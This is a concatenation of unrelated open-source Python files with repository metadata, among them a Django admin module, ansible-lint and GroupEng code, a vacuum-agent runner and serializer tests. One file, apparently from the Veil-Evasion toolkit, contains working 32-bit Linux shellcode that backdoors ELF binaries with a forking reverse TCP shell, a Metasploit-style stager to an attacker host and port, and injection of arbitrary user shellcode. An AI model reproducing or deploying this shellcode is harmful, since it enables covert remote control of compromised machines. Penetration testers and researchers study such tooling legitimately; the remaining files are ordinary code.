meas.write('State\t\tLambda\t\tThroughput\t\tLatency\t\tCPU\t\tTime\n')
meas.close()
# load training set
meas = open(self.trainingFile, 'r+')
if os.stat(self.trainingFile).st_size != 0:
# Read the training set measurements saved in the file.
meas.next() # Skip the first line with the headers of the columns
for line in meas:
# Skip comments (used in training sets)
if not line.startswith('###'):
m = line.split('\t\t')
self.add_measurement(m)
meas.close()
def add_measurement(self, metrics, write_file=False, write_mem=True):
"""
adds the measurement to either memory or file or both
        @param metrics: array The metrics to store. An array containing [state, lambda, throughput, latency, cpu, time]
        @param write_file: boolean If set, write the measurement to the txt file
:return:
"""
if self.measurementsPolicy.startswith('average'):
if not self.sumMetrics.has_key(metrics[0]):
# Save the metric with the state as key metrics = [state, inlambda, throughput, latency]
self.sumMetrics[metrics[0]] = {'inlambda': 0.0, 'throughput': 0.0, 'latency': 0.0, 'divide_by': 0}
self.sumMetrics[metrics[0]] = {'inlambda': self.sumMetrics[metrics[0]]['inlambda'] + float(metrics[1]),
'throughput': self.sumMetrics[metrics[0]]['throughput'] + float(metrics[2]),
'latency': self.sumMetrics[metrics[0]]['latency'] + float(metrics[3]),
'divide_by': self.sumMetrics[metrics[0]]['divide_by'] + 1}
if self.debug and write_file:
self.log.debug("add_measurements: won't load measurement to memory")
else:
if write_mem:
                # metrics-> 0: state, 1: lambda, 2: throughput, 3: latency, 4: cpu, 5: time
if not self.memory.has_key(metrics[0]):
self.memory[str(metrics[0])] = {}
#self.memory[str(metrics[0])]['V'] = None # placeholder for rewards and metrics
self.memory[str(metrics[0])]['r'] = None
self.memory[str(metrics[0])]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
elif self.memory[metrics[0]]['arrayMeas'] is None:
self.memory[metrics[0]]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
else:
self.memory[metrics[0]]['arrayMeas'] = np.append(self.memory[metrics[0]]['arrayMeas'],
[[float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])]], axis=0)
# but add 1 zero measurement for each state for no load cases ??? too many 0s affect centroids?
if write_file:
if write_mem:
used = "Yes"
else:
used = "No"
ms = open(self.measurementsFile, 'a')
# metrics[5] contains the time tick -- when running a simulation, it represents the current minute,
# on actual experiments, it is the current time. Used for debugging and plotting
ms.write(str(metrics[0]) + '\t\t' + str(metrics[1]) + '\t\t' + str(metrics[2]) + '\t\t' +
str(metrics[3]) + '\t\t' + str(metrics[4]) + '\t\t' + str(metrics[5]) + '\t\t'+ used+'\n')
ms.close()
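    # Illustrative call (values are made up; `dm` stands for an RLDecisionMaker
    # instance): record one measurement for an 8-node cluster, keeping it in
    # memory and appending it to the measurements file.
    #
    #     dm.add_measurement(['8', 1500.0, 1450.0, 35.2, 0.6, 12], write_file=True)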
# param state: string Get the average metrics (throughput, latency) for this state.
# return a dictionary with the averages
def get_averages(self, state):
averages = {}
if self.sumMetrics.has_key(state):
averages['throughput'] = float(self.sumMetrics[state]['throughput'] / self.sumMetrics[state]['divide_by'])
averages['latency'] = float(self.sumMetrics[state]['latency'] / self.sumMetrics[state]['divide_by'])
self.log.debug("GETAVERAGES Average metrics for state: " + state + " num of measurements: " + str(
self.sumMetrics[state]['divide_by']) +
" av. throughput: " + str(averages['throughput']) + " av. latency: " +
str(averages['latency']))
return averages
def doKmeans(self, state, from_inlambda, to_inlambda):
        # Run kmeans for the measurements of this state and return the centroid point (throughput, latency)
ctd = {}
label = []
centroids = {}
if self.memory[state]['arrayMeas'] != None:
count_state_measurements = len(self.memory[state]['arrayMeas'])
# self.log.debug("DOKMEANS " + str(len(self.memory[state]['arrayMeas'])) +
# " measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
                # If this measurement belongs in the slice we're interested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
if sliced_data == None:
|
moshthepitt/product.co.ke
|
core/admin.py
|
Python
|
mit
| 458
| 0.004367
|
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from django.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import RedactorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
        models.TextField: {'widget': RedactorWidget(editor_options={'lang': 'en'})}
}
admin.site.unregister(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
|
cbrunker/quip
|
lib/Utils.py
|
Python
|
gpl-3.0
| 4,795
| 0.003337
|
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
    @param uid: UUID value to be verified, can be bytes or str
@return: True if UUID valid, else False
"""
try:
        # attempt conversion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
# check converted value from UUID equals original value. UUID class is not strict on input
return str(out) == uid
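# Illustrative checks (not part of the original module): only canonical,
# version-4 UUID strings (or their ASCII-encoded bytes) pass.
#
#     isValidUUID('f47ac10b-58cc-4372-a567-0e02b2c3d479')   # -> True
#     isValidUUID(b'f47ac10b-58cc-4372-a567-0e02b2c3d479')  # -> True
#     isValidUUID('not-a-uuid')                             # -> False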
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
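# Illustrative usage (hypothetical path): the file is read in 1024-byte blocks,
# so large files are never loaded into memory at once; the digest is returned
# as ASCII bytes. For an empty file the result is
# b'da39a3ee5e6b4b0d3255bfef95601890afd80709'.
#
#     sha1sum('/tmp/example.bin', blocksize=4096)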
def checkCerts():
"""
Checks to see if required TLS certificates exist in Resources directory. Attempts to generate certificates if not found
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
if not all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
hasOpenSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
newDir = ofile
break
if not hasOpenSSL and files:
                # sorted filenames to list newest version first
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
if all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
|
tdimiduk/groupeng
|
src/input_parser.py
|
Python
|
agpl-3.0
| 2,845
| 0.002109
|
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
rule['name'] = split_key(line)[0].lower()
rule['attribute'] = split_key(line)[1]
            # read extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
                val = tuple([v.strip() for v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
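# Illustrative GroupEng input sketch (hypothetical file contents, written to be
# consistent with the parser above; top-level keys are 'key: value' lines and
# each rule starts with '-', with its extra arguments on the following lines):
#
#     classlist: students.csv
#     group_size: 4
#     - balance: gpa
#     - distribute: gender
#       values: female
#
# read_input() collects the top-level keys into the returned dict and gathers
# each '-' block into dek['rules'].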
|
austinban/aima-python
|
submissions/Porter/vacuum2Runner.py
|
Python
|
mit
| 6,343
| 0.006779
|
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environment
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
                # TableDrivenVacuumAgent, ModelBasedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
        bump = ('Bump' if agent.bump else 'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
# # Launch a Text-Based Environment
# print('Two Cells, Agent on Left:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Right:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (2, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Top:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Bottom:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 2))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
| 0.00542
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only (Intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
            sys.exit(1)
        self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
        For use with position independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
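# --- Hedged usage sketch: not part of the original Veil-Evasion source. ---
# A minimal illustration of how the class appears meant to be driven. The HOST,
# PORT and e_entry values below are made-up assumptions; in the real tool they
# come from the backdoor factory's command line and the parsed ELF header.
if __name__ == '__main__':
    sc = linux_elfI32_shellcode('192.168.1.10', 4444, 0x08048400)
    payload = sc.reverse_shell_tcp()
    print "reverse_shell_tcp payload: %d bytes" % len(payload)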
|
rsalmaso/django-cms
|
cms/migrations/0015_auto_20160421_0000.py
|
Python
|
bsd-3-clause
| 391
| 0.002558
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
            field=models.PositiveSmallIntegerField(default=0, verbose_name='position', editable=False),
),
]
|
rbmj/pyflightcontrol
|
pyflightcontrol/base/__init__.py
|
Python
|
apache-2.0
| 305
| 0
|
from . import font
from .indicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIndicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystick import Joystick
from . import base_test
|
MarxMustermann/OfMiceAndMechs
|
src/itemFolder/military/bomb.py
|
Python
|
gpl-3.0
| 1,990
| 0.009045
|
import src
import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy everything on the current tile or the container.
    Activate it to trigger an explosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
        event = src.events.RunCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
|
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
|
huaiping/pandora
|
salary/models.py
|
Python
|
mit
| 332
| 0.03012
|
from django.db import models
class Salary(models.Model):
    id = models.AutoField(primary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
class Meta:
db_table = 'swan_salary'
|
def __str__(self):
        return str(self.id)
|
PeterDowdy/py-paradox-convert
|
tests/serialization_tests.py
|
Python
|
mit
| 2,040
| 0.007353
|
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
def test_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
        input = [{ 'name': ['first', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
        self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
|
xbmcmegapack/plugin.video.megapack.dev
|
resources/lib/menus/home_countries_virgin_islands_us.py
|
Python
|
gpl-3.0
| 1,134
| 0.00265
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
    with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
        menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
            "Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."]))
|
willthames/ansible-lint
|
lib/ansiblelint/rules/GitHasVersionRule.py
|
Python
|
mit
| 1,699
| 0
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
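# --- Hedged illustration; not part of the upstream ansible-lint rule file. ---
# matchtask() flags git tasks whose 'version' is missing or left at the
# implicit HEAD default. The task dictionaries below only mimic the structure
# ansible-lint passes in; the file argument is unused by this rule.
if __name__ == '__main__':
    rule = GitHasVersionRule()
    floating = {'action': {'__ansible_module__': 'git', 'repo': 'https://example.com/app.git'}}
    pinned = {'action': {'__ansible_module__': 'git', 'repo': 'https://example.com/app.git', 'version': 'v1.2.3'}}
    print(rule.matchtask(None, floating))  # True  -> flagged, no explicit version
    print(rule.matchtask(None, pinned))    # False -> explicit tag satisfies the rule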
|
luci/luci-py
|
client/third_party/depot_tools/fix_encoding.py
|
Python
|
apache-2.0
| 12,497
| 0.009842
|
